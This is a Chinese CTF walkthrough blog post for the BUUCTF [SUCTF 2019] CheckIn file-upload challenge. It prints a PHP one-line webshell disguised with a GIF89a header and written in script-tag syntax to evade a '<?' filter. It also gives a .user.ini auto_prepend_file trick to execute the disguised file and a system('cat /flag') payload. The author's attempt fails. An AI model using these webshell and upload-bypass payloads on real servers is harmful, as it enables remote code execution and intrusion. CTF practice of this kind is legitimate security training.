106,【6】 buuctf web [SUCTF 2019]CheckIn

进入靶场

文件上传

老规矩,桌面有啥传啥

过滤了<?

寻找不含<?的一句话木马

文件名

123(2).php.jpg

文件内容

GIF89a?

<script language="php">eval($_GET['123']);</script>

123即密码,可凭借个人喜好更换

再上传一个文件将jpg文件变成php文件执行

这里用到.htaccess发现不行

尝试.user.ini

文件名

123(3).user.ini

文件内容

GIF89a

auto_prepend_file=123(3).php.jpg

文件名

123(3).php.jpg

文件内容

GIF89a

<script language='php'>system('cat /flag');</script>

按理说该查看即可得到flag了

但查看时为空

看看是哪步出了问题

没有上传成功

修改文件名,还是上传不成功

摧毁靶机,重试

要么url中81就不见了,像上图

要么返回上传页面

还发现不管上传什么路径都不变,尝试上传下面这张图片,还是那个路径,不是,路径变都不变,还是没上传成功,访问不到,这只是一个中规中矩的图片

尝试修改文件那么多遍,合着题目有问题

我再最后改一次

再开启一次靶场

还是不行

净是些让人破防的题

想到见到了很多次状态码500,搜搜看什么意思

so???????????????????????????????

相关推荐
介一安全2 天前
【Web安全】Blind XSS漏洞:从挖掘到防御
安全·web安全·xss
\xin3 天前
pikachu自编exp,xss反射性get,post,存储型xss,dom,dom-x
前端·javascript·xss
\xin4 天前
pikachu自编exp,xss之盲打,过滤,htmlspecialchars,href,js
前端·xss
其实防守也摸鱼5 天前
面试常问问题总结--渗透测试工程师方向
网络·sql·面试·职场和发展·xss·工具·owasp
淼淼爱喝水6 天前
基于DOM型XSS漏洞与利用实验教程
前端·xss·dom·dvwa
天山@1237 天前
跨站脚本攻击(XSS)深度剖析:从原理到实战绕过及防御体系
网络安全·xss·beef
兄弟加油,别颓废了。7 天前
XSS-Labs 前 5 关 超详细通关全解
前端·xss
牛奶9 天前
黑客是怎么偷走你账号的?
黑客·浏览器·xss
2603_9535279912 天前
WordPress Finale Lite 插件高危漏洞检测与利用工具 (CVE-2024-30485)
前端·python·安全·web3·xss
oi..13 天前
从 0 到 1:文件上传漏洞的校验、绕过与真实场景利用
网络·笔记·计算机网络·安全·web安全·网络安全·xss